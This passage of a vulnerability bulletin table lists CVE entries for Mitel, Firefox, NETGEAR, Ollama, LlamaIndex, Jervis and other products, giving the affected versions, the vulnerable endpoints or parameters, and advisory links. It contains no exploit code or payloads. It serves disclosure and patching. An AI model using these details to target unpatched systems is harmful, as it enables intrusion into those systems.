| Mini Router--Italy Wireless | A Stored Cross-Site Scripting (XSS) vulnerability in the Web management interface in Each Italy Wireless Mini Router WIRELESS-N 300M v28K.MiniRouter.20190211 allows attackers to execute arbitrary scripts via a crafted payload due to the unsanitized repeater AP SSID value when it is displayed in any page at /index.htm. | 2026-01-15 | not yet calculated | CVE-2025-65349 | https://imgur.com/a/X9DNOBj https://github.com/5ulfur/security-advisories/tree/main/CVE-2025-65349 |
| Mitel MiVoice--Mitel MiVoice | A vulnerability in the Provisioning Manager component of Mitel MiVoice MX-ONE 7.3 (7.3.0.0.50) through 7.8 SP1 (7.8.1.0.14) could allow an unauthenticated attacker to conduct an authentication bypass attack due to improper authentication mechanisms. A successful exploit could allow an attacker to gain unauthorized access to user or admin accounts in the system. | 2026-01-15 | not yet calculated | CVE-2025-67822 | https://www.mitel.com/support/security-advisories https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2025-0009 |
| Mitel--Mitel | A vulnerability in the Multimedia Email component of Mitel MiContact Center Business through 10.2.0.10 and Mitel CX through 1.1.0.1 could allow an unauthenticated attacker to conduct a Cross-Site Scripting (XSS) attack due to insufficient input validation. A successful exploit requires user interaction where the email channel is enabled. This could allow an attacker to execute arbitrary scripts in the victim's browser or desktop client application. | 2026-01-15 | not yet calculated | CVE-2025-67823 | https://www.mitel.com/support/security-advisories https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2025-0010 |
| mlflow--mlflow/mlflow | MLFlow versions up to and including 3.4.0 are vulnerable to DNS rebinding attacks due to a lack of Origin header validation in the MLFlow REST server. This vulnerability allows malicious websites to bypass Same-Origin Policy protections and execute unauthorized calls against REST endpoints. An attacker can query, update, and delete experiments via the affected endpoints, leading to potential data exfiltration, destruction, or manipulation. The issue is resolved in version 3.5.0. | 2026-01-12 | not yet calculated | CVE-2025-14279 | https://huntr.com/bounties/ef478f72-2e4f-44dc-8055-fc06bef03108 https://github.com/mlflow/mlflow/commit/b0ffd289e9b0d0cc32c9e3a9b9f3843ae83dbec3 |
| Mozilla--Firefox | Mitigation bypass in the DOM: Security component. This vulnerability affects Firefox < 147, Firefox ESR < 115.32, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0877 | https://bugzilla.mozilla.org/show_bug.cgi?id=1999257 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-02/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Sandbox escape due to incorrect boundary conditions in the Graphics: CanvasWebGL component. This vulnerability affects Firefox < 147, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0878 | https://bugzilla.mozilla.org/show_bug.cgi?id=2003989 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Sandbox escape due to incorrect boundary conditions in the Graphics component. This vulnerability affects Firefox < 147, Firefox ESR < 115.32, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0879 | https://bugzilla.mozilla.org/show_bug.cgi?id=2004602 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-02/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Sandbox escape due to integer overflow in the Graphics component. This vulnerability affects Firefox < 147, Firefox ESR < 115.32, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0880 | https://bugzilla.mozilla.org/show_bug.cgi?id=2005014 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-02/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Sandbox escape in the Messaging System component. This vulnerability affects Firefox < 147 and Thunderbird < 147. | 2026-01-13 | not yet calculated | CVE-2026-0881 | https://bugzilla.mozilla.org/show_bug.cgi?id=2005845 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-04/ |
| Mozilla--Firefox | Use-after-free in the IPC component. This vulnerability affects Firefox < 147, Firefox ESR < 115.32, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0882 | https://bugzilla.mozilla.org/show_bug.cgi?id=1924125 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-02/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Information disclosure in the Networking component. This vulnerability affects Firefox < 147, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0883 | https://bugzilla.mozilla.org/show_bug.cgi?id=1989340 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Use-after-free in the JavaScript Engine component. This vulnerability affects Firefox < 147, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0884 | https://bugzilla.mozilla.org/show_bug.cgi?id=2003588 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Use-after-free in the JavaScript: GC component. This vulnerability affects Firefox < 147, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0885 | https://bugzilla.mozilla.org/show_bug.cgi?id=2003607 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Incorrect boundary conditions in the Graphics component. This vulnerability affects Firefox < 147, Firefox ESR < 115.32, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0886 | https://bugzilla.mozilla.org/show_bug.cgi?id=2005658 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-02/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Clickjacking issue, information disclosure in the PDF Viewer component. This vulnerability affects Firefox < 147, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0887 | https://bugzilla.mozilla.org/show_bug.cgi?id=2006500 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Information disclosure in the XML component. This vulnerability affects Firefox < 147 and Thunderbird < 147. | 2026-01-13 | not yet calculated | CVE-2026-0888 | https://bugzilla.mozilla.org/show_bug.cgi?id=1985996 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-04/ |
| Mozilla--Firefox | Denial-of-service in the DOM: Service Workers component. This vulnerability affects Firefox < 147 and Thunderbird < 147. | 2026-01-13 | not yet calculated | CVE-2026-0889 | https://bugzilla.mozilla.org/show_bug.cgi?id=1999084 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-04/ |
| Mozilla--Firefox | Spoofing issue in the DOM: Copy & Paste and Drag & Drop component. This vulnerability affects Firefox < 147, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0890 | https://bugzilla.mozilla.org/show_bug.cgi?id=2005081 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Memory safety bugs present in Firefox ESR 140.6, Thunderbird ESR 140.6, Firefox 146 and Thunderbird 146. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 147, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0891 | Memory safety bugs fixed in Firefox ESR 140.7, Thunderbird ESR 140.7, Firefox 147 and Thunderbird 147 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Memory safety bugs present in Firefox 146 and Thunderbird 146. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 147 and Thunderbird < 147. | 2026-01-13 | not yet calculated | CVE-2026-0892 | Memory safety bugs fixed in Firefox 147 and Thunderbird 147 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-04/ |
| nanomq--nanomq | An issue in nanomq v0.22.7 allows attackers to cause a Denial of Service (DoS) via a crafted request. The number of data packets received in the recv-q queue of the Nanomq process continues to increase, causing the nanomq broker to fall into a deadlock and be unable to provide normal services. | 2026-01-15 | not yet calculated | CVE-2024-48077 | https://github.com/nanomq/nanomq https://gist.github.com/pengwGit/2379e7a8fe75d09621f7c060db0237c4 |
| NAVER--lucy-xss-filter | lucy-xss-filter before commit 7c1de6d allows an attacker to induce server-side HEAD requests to arbitrary URLs when the ObjectSecurityListener or EmbedSecurityListener option is enabled and embed or object tags are used with a src attribute missing a file extension. | 2026-01-16 | not yet calculated | CVE-2026-23768 | https://cve.naver.com/detail/cve-2026-23768.html https://github.com/naver/lucy-xss-filter/pull/31 |
| NAVER--lucy-xss-filter | lucy-xss-filter before commit e5826c0 allows an attacker to execute malicious JavaScript due to improper sanitization caused by misconfigured default superset rule files. | 2026-01-16 | not yet calculated | CVE-2026-23769 | https://cve.naver.com/detail/cve-2026-23769.html https://github.com/naver/lucy-xss-filter/pull/32 |
| Neoteroi--BlackSheep | BlackSheep is an asynchronous web framework to build event based web applications with Python. Prior to 2.4.6, the HTTP Client implementation in BlackSheep is vulnerable to CRLF injection. Missing headers validation makes it possible for an attacker to modify the HTTP requests (e.g. insert a new header) or even create a new HTTP request. Exploitation requires developers to pass unsanitized user input directly into headers. The server part is not affected because BlackSheep delegates handling of response headers to an underlying ASGI server. This vulnerability is fixed in 2.4.6. | 2026-01-14 | not yet calculated | CVE-2026-22779 | https://github.com/Neoteroi/BlackSheep/security/advisories/GHSA-6pw3-h7xf-x4gp https://github.com/Neoteroi/BlackSheep/commit/bd4ecb9542b5d52442276b5a6907931b90f38d12 https://github.com/Neoteroi/BlackSheep/releases/tag/v2.4.6 |
| NETAPP--ONTAP 9 | ONTAP versions 9.16.1 prior to 9.16.1P9 and 9.17.1 prior to 9.17.1P2 with snapshot locking enabled are susceptible to a vulnerability which could allow a privileged remote attacker to set the snapshot expiry time to none. | 2026-01-12 | not yet calculated | CVE-2026-22050 | https://security.netapp.com/advisory/NTAP-20260112-0001 |
| NETGEAR--EX5000 | An insufficient authentication vulnerability in NETGEAR WiFi range extenders allows a network adjacent attacker with WiFi authentication or a physical Ethernet port connection to bypass the authentication process and access the admin panel. | 2026-01-13 | not yet calculated | CVE-2026-0407 | https://www.netgear.com/support/product/ex5000 https://www.netgear.com/support/product/ex3110 https://www.netgear.com/support/product/ex6110 https://www.netgear.com/support/product/ex2800 https://kb.netgear.com/000070442/January-2026-NETGEAR-Security-Advisory |
| NETGEAR--EX5000 | A path traversal vulnerability in NETGEAR WiFi range extenders allows an attacker with LAN authentication to access the router's IP and review the contents of the dynamically generated webproc file, which records the username and password submitted to the router GUI. | 2026-01-13 | not yet calculated | CVE-2026-0408 | https://www.netgear.com/support/product/ex5000 https://www.netgear.com/support/product/ex3110 https://www.netgear.com/support/product/ex6110 https://www.netgear.com/support/product/ex2800 https://kb.netgear.com/000070442/January-2026-NETGEAR-Security-Advisory |
| NETGEAR--RBE970 | An authentication bypass vulnerability in NETGEAR Orbi devices allows users connected to the local network to access the router web interface as an admin. | 2026-01-13 | not yet calculated | CVE-2026-0405 | https://www.netgear.com/support/product/rbe971 https://www.netgear.com/support/product/rbe970 https://www.netgear.com/support/product/cbr750 https://www.netgear.com/support/product/nbr750 https://www.netgear.com/support/product/rbe770 https://www.netgear.com/support/product/rbe771 https://www.netgear.com/support/product/rbe772 https://www.netgear.com/support/product/rbe773 https://www.netgear.com/support/product/rbr750 https://www.netgear.com/support/product/rbs750 https://www.netgear.com/support/product/rbr840 https://www.netgear.com/support/product/rbs840 https://www.netgear.com/support/product/rbr850 https://www.netgear.com/support/product/rbs850 https://www.netgear.com/support/product/rbr860 https://www.netgear.com/support/product/rbs860 https://www.netgear.com/support/product/rbre950 https://www.netgear.com/support/product/rbse950 https://www.netgear.com/support/product/rbre960 https://www.netgear.com/support/product/rbse960 https://www.netgear.com/support/product/rbe370 https://www.netgear.com/support/product/rbe371 https://www.netgear.com/support/product/rbe372 https://www.netgear.com/support/product/rbe373 https://www.netgear.com/support/product/rbe374 https://kb.netgear.com/000070442/January-2026-NETGEAR-Security-Advisory |
| NETGEAR--RBR750 | An insufficient input validation vulnerability in NETGEAR Orbi routers allows attackers connected to the router's LAN to execute OS command injections. | 2026-01-13 | not yet calculated | CVE-2026-0403 | https://www.netgear.com/support/product/rbr750 https://www.netgear.com/support/product/rbs750 https://www.netgear.com/support/product/rbre960 https://www.netgear.com/support/product/rbse960 https://www.netgear.com/support/product/rbr850 https://www.netgear.com/support/product/rbs850 https://www.netgear.com/support/product/rbe971 https://www.netgear.com/support/product/rbe970 https://www.netgear.com/support/product/rbr860 https://www.netgear.com/support/product/rbs860 https://kb.netgear.com/000070442/January-2026-NETGEAR-Security-Advisory |
| NETGEAR--RBRE960 | An insufficient input validation vulnerability in NETGEAR Orbi devices' DHCPv6 functionality allows network adjacent attackers authenticated over WiFi or on LAN to execute OS command injections on the router. DHCPv6 is not enabled by default. | 2026-01-13 | not yet calculated | CVE-2026-0404 | https://www.netgear.com/support/product/rbre960 https://www.netgear.com/support/product/rbse960 https://www.netgear.com/support/product/rbr850 https://www.netgear.com/support/product/rbs850 https://www.netgear.com/support/product/rbr860 https://www.netgear.com/support/product/rbs860 https://www.netgear.com/support/product/rbre950 https://www.netgear.com/support/product/rbse950 https://www.netgear.com/support/product/rbr750 https://www.netgear.com/support/product/rbs750 https://www.netgear.com/support/product/rbr840 https://www.netgear.com/support/product/rbs840 https://kb.netgear.com/000070442/January-2026-NETGEAR-Security-Advisory |
| NETGEAR--XR1000v2 | An insufficient input validation vulnerability in the NETGEAR XR1000v2 allows attackers connected to the router's LAN to execute OS command injections. | 2026-01-13 | not yet calculated | CVE-2026-0406 | https://www.netgear.com/support/product/xr1000v2 https://kb.netgear.com/000070442/January-2026-NETGEAR-Security-Advisory |
| Ollama--Ollama | Ollama 0.11.5-rc0 through current version 0.13.5 contain a null pointer dereference vulnerability in the multi-modal model image processing functionality. When processing base64-encoded image data via the /api/chat endpoint, the application fails to validate that the decoded data represents valid media before passing it to the mtmd_helper_bitmap_init_from_buf function. This function can return NULL for malformed input, but the code does not check this return value before dereferencing the pointer in subsequent operations. A remote attacker can exploit this by sending specially crafted base64 image data that decodes to invalid media, causing a segmentation fault and crashing the runner process. This results in a denial of service condition where the model becomes unavailable to all users until the service is restarted. | 2026-01-12 | not yet calculated | CVE-2025-15514 | https://huntr.com/bounties/172df98b-07cd-41ea-a628-366f8cd525c0 https://ollama.com/ https://github.com/ollama/ollama https://www.vulncheck.com/advisories/ollama-multi-modal-image-processing-null-pointer-dereference |
| Omnilogic--Omni Secure Files | Omni Secure Files plugin versions prior to 0.1.14 contain an arbitrary file upload vulnerability in the bundled plupload example endpoint. The /wp-content/plugins/omni-secure-files/plupload/examples/upload.php handler allows unauthenticated uploads without enforcing safe file type restrictions, enabling an attacker to place attacker-controlled files under the plugin's uploads directory. This can lead to remote code execution if a server-executable file type is uploaded and subsequently accessed. | 2026-01-16 | not yet calculated | CVE-2012-10064 | https://wpscan.com/vulnerability/376fd666-6471-479c-9b74-1d8088a33e89/ https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/omni-secure-files/omni-secure-files-0113-arbitrary-file-upload https://wordpress.org/plugins/omni-secure-files/ https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-omni-secure-files-upload-php-arbitrary-file-upload-0-1-13/ https://web.archive.org/web/20121025112632/http%3A//secunia.com/advisories/49441 https://packetstorm.news/files/id/113411 https://www.exploit-db.com/exploits/19009 https://web.archive.org/web/20191021091221/https%3A//www.securityfocus.com/bid/53872/ https://www.vulncheck.com/advisories/omni-secure-files-unauthenticated-arbitrary-file-upload |
| Omnispace--Omnispace | Directory traversal vulnerability in Omnispace Agora Project before 25.10 allowing unauthenticated attackers to read files on the system via the misc controller and the ExternalGetFile action. Only files with an extension can be read. | 2026-01-15 | not yet calculated | CVE-2025-67076 | https://www.agora-project.net https://www.helx.io/blog/advisory-agora-project/ |
| Omnispace--Omnispace | File upload vulnerability in Omnispace Agora Project before 25.10 allowing authenticated users, or under certain conditions also guest users, to upload files via the UploadTmpFile action. | 2026-01-15 | not yet calculated | CVE-2025-67077 | https://www.agora-project.net https://www.helx.io/blog/advisory-agora-project/ |
| Omnispace--Omnispace | Cross site scripting (XSS) vulnerability in Omnispace Agora Project before 25.10 allowing attackers to execute arbitrary code via the notify parameter of the file controller used to display errors. | 2026-01-15 | not yet calculated | CVE-2025-67078 | https://www.agora-project.net https://www.helx.io/blog/advisory-agora-project/ |
| Omnispace--Omnispace | File upload vulnerability in Omnispace Agora Project before 25.10 allowing attackers to execute code through the MSL engine of the Imagick library via a crafted PDF file submitted to the file upload and thumbnail functions. | 2026-01-15 | not yet calculated | CVE-2025-67079 | https://www.agora-project.net https://www.helx.io/blog/advisory-agora-project/ |
| orval-labs--orval | orval generates type-safe JS clients (TypeScript) from any valid OpenAPI v3 or Swagger v2 specification. Prior to 7.18.0, the MCP server generation logic relies on string manipulation that incorporates the summary field from the OpenAPI specification without proper validation or escaping. This allows an attacker to "break out" of the string literal and inject arbitrary code. This vulnerability is fixed in 7.18.0. | 2026-01-12 | not yet calculated | CVE-2026-22785 | https://github.com/orval-labs/orval/security/advisories/GHSA-mwr6-3gp8-9jmj https://github.com/orval-labs/orval/commit/80b5fe73b94f120a3a5561952d6d4b0f8d7e928d |
| Paessler--Paessler | Paessler PRTG Network Monitor before 25.4.114 allows XSS by an unauthenticated attacker via the tag parameter. | 2026-01-14 | not yet calculated | CVE-2025-67833 | https://paessler.com https://helpdesk.paessler.com/en/support/solutions/articles/76000087289-vulnerabilities-in-prtg-prior-v25-4-114-1032 |
| Paessler--Paessler | Paessler PRTG Network Monitor before 25.4.114 allows XSS by an unauthenticated attacker via the filter parameter. | 2026-01-14 | not yet calculated | CVE-2025-67834 | https://paessler.com https://helpdesk.paessler.com/en/support/solutions/articles/76000087289-vulnerabilities-in-prtg-prior-v25-4-114-1032 |
| Paessler--Paessler | Paessler PRTG Network Monitor before 25.4.114 allows Denial-of-Service (DoS) by an authenticated attacker via the Notification Contacts functionality. | 2026-01-14 | not yet calculated | CVE-2025-67835 | https://paessler.com https://helpdesk.paessler.com/en/support/solutions/articles/76000087289-vulnerabilities-in-prtg-prior-v25-4-114-1032 |
| Palo Alto Networks--Cloud NGFW | A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to cause a denial of service (DoS) to the firewall. Repeated attempts to trigger this issue results in the firewall entering into maintenance mode. | 2026-01-15 | not yet calculated | CVE-2026-0227 | https://security.paloaltonetworks.com/CVE-2025-4620 |
| Pegasystems--Pega Infinity | Pega Customer Service Framework versions 8.7.0 through 25.1.0 are affected by an unrestricted file upload vulnerability, where a privileged user could potentially upload a malicious file. | 2026-01-13 | not yet calculated | CVE-2025-62182 | https://support.pega.com/support-doc/pega-security-advisory-l25-vulnerability-remediation-note |
| pH7Software--pH7Software | A stored cross-site scripting (XSS) vulnerability exists in pH7Software pH7-Social-Dating-CMS 17.9.1 in the user profile Description field. | 2026-01-14 | not yet calculated | CVE-2025-63644 | https://drive.google.com/drive/folders/1mYDvUTnlTPCGTB-7tHD3pmu_wHtlMVRP https://medium.com/@rudranshsinghrajpurohit/cve-2025-63644-stored-cross-site-scripting-xss-vulnerability-in-ph7-social-dating-cms-23ed0e7eb853 |
| phpgurukul--phpgurukul | phpgurukul News Portal Project V4.1 has an Arbitrary File Deletion Vulnerability in remove_file.php. The parameter file can cause any file to be deleted. | 2026-01-13 | not yet calculated | CVE-2025-69990 | https://github.com/Y4y17/CVE/blob/main/News%20Portal%20Project/File%20deletion%20vulnerability.md |
| phpgurukul--phpgurukul | phpgurukul News Portal Project V4.1 is vulnerable to SQL Injection in check_availablity.php. | 2026-01-13 | not yet calculated | CVE-2025-69991 | https://github.com/Y4y17/CVE/blob/main/News%20Portal%20Project/SQL%20Injection.md |
| phpgurukul--phpgurukul | phpgurukul News Portal Project V4.1 has File Upload Vulnerability via upload.php, which enables the upload of files of any format to the server without identity authentication. | 2026-01-13 | not yet calculated | CVE-2025-69992 | https://github.com/Y4y17/CVE/blob/main/News%20Portal%20Project/File%20upload%20vulnerability.md |
| QloApps--QloApps | A CSRF issue in index.php in QloApps hotel eCommerce 1.5.1 allows an attacker to change the admin's email address via a crafted HTML document. | 2026-01-12 | not yet calculated | CVE-2021-41074 | https://qloapps.com/ https://github.com/dillonkirsch/CVE-2021-41074 |
| RIOT--RIOT OS | RIOT OS versions up to and including 2026.01-devel-317 contain a stack-based buffer overflow vulnerability in the tapslip6 utility. The vulnerability is caused by unsafe string concatenation in the devopen() function, which constructs a device path using unbounded user-controlled input. The utility uses strcpy() and strcat() to concatenate the fixed prefix '/dev/' with a user-supplied device name provided via the -s command-line option without bounds checking. This allows an attacker to supply an excessively long device name and overflow a fixed-size stack buffer, leading to process crashes and memory corruption. | 2026-01-12 | not yet calculated | CVE-2026-22213 | https://seclists.org/fulldisclosure/2026/Jan/15 https://www.riot-os.org/ https://github.com/RIOT-OS/RIOT https://www.vulncheck.com/advisories/riot-os-stack-based-buffer-overflow-in-tapslip6-utility |
| RIOT--RIOT OS | RIOT OS versions up to and including 2026.01-devel-317 contain a stack-based buffer overflow vulnerability in the ethos utility due to missing bounds checking when processing incoming serial frame data. The vulnerability occurs in the _handle_char() function, where incoming frame bytes are appended to a fixed-size stack buffer without verifying that the current write index remains within bounds. An attacker capable of sending crafted serial or TCP-framed input can cause the current write index to exceed the buffer size, resulting in a write past the end of the stack buffer. This condition leads to memory corruption and application crash. | 2026-01-12 | not yet calculated | CVE-2026-22214 | https://seclists.org/fulldisclosure/2026/Jan/16 https://www.riot-os.org/ https://github.com/RIOT-OS/RIOT https://www.vulncheck.com/advisories/riot-os-stack-based-buffer-overflow-in-ethos-serial-frame-parser |
| run-llama--llama_index | LlamaIndex (run-llama/llama_index) versions up to and including 0.11.6 contain an unsafe deserialization vulnerability in BGEM3Index.load_from_disk() in llama_index/indices/managed/bge_m3/base.py. The function uses pickle.load() to deserialize multi_embed_store.pkl from a user-supplied persist_dir without validation. An attacker who can provide a crafted persist directory containing a malicious pickle file can trigger arbitrary code execution when the victim loads the index from disk. | 2026-01-12 | not yet calculated | CVE-2024-14021 | https://huntr.com/bounties/ab4ceeb4-aa85-4d1c-aaca-4eda1b71fc12 https://www.llamaindex.ai/ https://github.com/run-llama/llama_index https://www.vulncheck.com/advisories/llamaindex-bgem3index-unsafe-deserialization |
| run-llama--llama_index | LlamaIndex (run-llama/llama_index) versions up to and including 0.12.2 contain an uncontrolled resource consumption vulnerability in the VannaPack VannaQueryEngine implementation. The custom_query() logic generates SQL statements from a user-supplied prompt and executes them via vn.run_sql() without enforcing query execution limits. In downstream deployments where untrusted users can supply prompts, an attacker can trigger expensive or unbounded SQL operations that exhaust CPU or memory resources, resulting in a denial-of-service condition. The vulnerable execution path occurs in llama_index/packs/vanna/base.py within custom_query(). | 2026-01-12 | not yet calculated | CVE-2024-58339 | https://huntr.com/bounties/a1d6c30d-fce0-412a-bd22-14e0d4c1fa1f https://www.llamaindex.ai/ https://github.com/run-llama/llama_index https://www.vulncheck.com/advisories/llamaindex-vannaqueryengine-sql-execution-allows-resource-exhaustion |
| RustCrypto--utils | RustCrypto CMOV provides conditional move CPU intrinsics which are guaranteed on major platforms to execute in constant-time and not be rewritten as branches by the compiler. Prior to 0.4.4, the thumbv6m-none-eabi (Cortex M0, M0+ and M1) compiler emits non-constant time assembly when using cmovnz (portable version). This vulnerability is fixed in 0.4.4. | 2026-01-15 | not yet calculated | CVE-2026-23519 | https://github.com/RustCrypto/utils/security/advisories/GHSA-2gqc-6j2q-83qp https://github.com/RustCrypto/utils/commit/55977257e7c82a309d5e8abfdd380a774f0f9778 |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. From >= 1.0.0-alpha.1 to 1.0.0-alpha.79, invalid RPC signatures cause the server to log the shared HMAC secret (and expected signature), which exposes the secret to log readers and enables forged RPC calls. In crates/ecstore/src/rpc/http_auth.rs, the invalid signature branch logs sensitive data. This log line includes secret and expected_signature, both derived from the shared HMAC key. Any invalidly signed request triggers this path. The function is reachable from RPC and admin request handlers. This vulnerability is fixed in 1.0.0-alpha.80. | 2026-01-16 | not yet calculated | CVE-2026-22782 | https://github.com/rustfs/rustfs/security/advisories/GHSA-333v-68xh-8mmq https://github.com/rustfs/rustfs/commit/6b2eebee1d07399ef02c0863bd515b4412a5a560 https://github.com/rustfs/rustfs/blob/9e162b6e9ebb874cc1d06a7b33bc4a05786578aa/crates/ecstore/src/rpc/http_auth.rs#L115-L122 |
| samrocketman--jervis | Jervis is a library for Job DSL plugin scripts and shared Jenkins pipeline libraries. Prior to 2.2, Jervis uses PKCS1Encoding which is vulnerable to Bleichenbacher padding oracle attacks. Modern systems should use OAEP (Optimal Asymmetric Encryption Padding). This vulnerability is fixed in 2.2. | 2026-01-13 | not yet calculated | CVE-2025-68698 | https://github.com/samrocketman/jervis/security/advisories/GHSA-mqw7-c5gg-xq97 https://github.com/samrocketman/jervis/commit/c3981ff71de7b0f767dfe7b37a2372cb2a51974a |
| samrocketman--jervis | Jervis is a library for Job DSL plugin scripts and shared Jenkins pipeline libraries. Prior to 2.2, Jervis uses deterministic AES IV derivation from a passphrase. This vulnerability is fixed in 2.2. | 2026-01-13 | not yet calculated | CVE-2025-68701 | https://github.com/samrocketman/jervis/security/advisories/GHSA-crxp-chh4-9ghp https://github.com/samrocketman/jervis/commit/c3981ff71de7b0f767dfe7b37a2372cb2a51974a |
| samrocketman--jervis | Jervis is a library for Job DSL plugin scripts and shared Jenkins pipeline libraries. Prior to 2.2, Jervis uses padLeft(32, '0') when it should use padLeft(64, '0') because SHA-256 produces 32 bytes which equates to 64 hex characters. This vulnerability is fixed in 2.2. | 2026-01-13 | not yet calculated | CVE-2025-68702 | https://github.com/samrocketman/jervis/security/advisories/GHSA-67rj-pjg6-pq59 https://github.com/samrocketman/jervis/commit/c3981ff71de7b0f767dfe7b37a2372cb2a51974a |
| samrocketman--jervis | Jervis is a library for Job DSL plugin scripts and shared Jenkins pipeline libraries. Prior to 2.2, the salt is derived from sha256Sum(passphrase). Two encryption operations with the same password will have the same derived key. This vulnerability is fixed in 2.2. | 2026-01-13 | not yet calculated | CVE-2025-68703 | https://github.com/samrocketman/jervis/security/advisories/GHSA-36h5-vrq6-pp34 https://github.com/samrocketman/jervis/commit/c3981ff71de7b0f767dfe7b37a2372cb2a51974a |
| samrocketman--jervis | Jervis is a library for Job DSL plugin scripts and shared Jenkins pipeline libraries. Prior to 2.2, Jervis uses java.util.Random() which is not cryptographically secure for timing attack mitigation. This vulnerability is fixed in 2.2. | 2026-01-13 | not yet calculated | CVE-2025-68704 | https://github.com/samrocketman/jervis/security/advisories/GHSA-c9q6-g3hr-8gww https://github.com/samrocketman/jervis/commit/c3981ff71de7b0f767dfe7b37a2372cb2a51974a |
| samrocketman--jervis | Jervis is a library for Job DSL plugin scripts and shared Jenkins pipeline libraries. Prior to 2.2, the code doesn't validate that the JWT header specifies "alg":"RS256". This vulnerability is fixed in 2.2. | 2026-01-13 | not yet calculated | CVE-2025-68925 | https://github.com/samrocketman/jervis/security/advisories/GHSA-5pq9-5mpr-jj85 https://github.com/samrocketman/jervis/commit/c3981ff71de7b0f767dfe7b37a2372cb2a51974a |
